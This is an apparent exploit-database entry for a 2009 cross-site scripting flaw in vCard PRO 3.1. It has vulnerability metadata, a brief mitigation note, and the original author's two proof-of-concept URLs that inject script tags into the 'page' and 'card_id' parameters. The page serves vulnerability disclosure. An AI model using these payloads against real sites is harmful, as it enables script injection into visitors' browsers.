header-logo
Suggest Exploit
vendor:
vCard PRO
by:
indoushka
3.3
CVSS
MEDIUM
Cross Site Scripting
79
CWE
Product Name: vCard PRO
Affected Version From: 3.1
Affected Version To: 3.1
Patch Exists: NO
Related CWE: N/A
CPE: a:iq-ty:vcard_pro
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux
2009

vCard PRO 3.1 Cross Site Scripting Vulnerability

vCard PRO 3.1 is vulnerable to Cross Site Scripting (XSS) attacks. An attacker can inject malicious JavaScript code into the 'page' and 'card_id' parameters of the 'newcards.php' and 'create.php' scripts, respectively. This malicious code will be executed in the browser of the victim when the vulnerable page is accessed.

Mitigation:

Input validation should be used to prevent XSS attacks. Sanitize all user input to prevent malicious code from being executed.
Source

Exploit-DB raw data:

========================================================================================
| # Title    : vCard PRO 3.1 Cross Site Scripting Vulnerability                        |
| # Author   : indoushka                                                               |
| # email    : indoushka@hotmail.com                                                   |
| # Home     : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860)       |
| # EDB-ID   : 10670                                                                   |
| # CVE-ID   : ()                                                                      |
| # OSVDB-ID : ()                                                                      |
| # DAte     :16/12/2009                                                               |
| # Verified :                                                                         |
| # Web Site : www.iq-ty.com                                                           |
| # Published:                                                                         |
| # Script   : Powered by vCard PRO 3.1 Translated by SCDT - SWiSHE Cards : SWiSHE.NeT �2005
| # Tested on: windows SP2 Fran�ais V.(Pnx2 2.0) + Lunix Fran�ais v.(9.4 Ubuntu)       |
| # Bug      : XSS                                                                     |
======================      Exploit By indoushka       =================================
| # Exploit  :
|
| 1- http://127.0.0.1:80/vcard/newcards.php?page=1<script>alert(+213771818860)</script>
| 2- http://127.0.0.1/vcard/create.php?card_id=1>"><ScRiPt%20%0d%0a>alert(+213771818860)%3B</ScRiPt>
|
================================   Dz-Ghost Team   ========================================
Greetz : all my friend * Dos-Dz * Snakespc * His0k4 * Hussin-X * Str0ke * Saoucha * Star08 |
-------------------------------------------------------------------------------------------

Navigation

Suggest Exploit

Services By CQR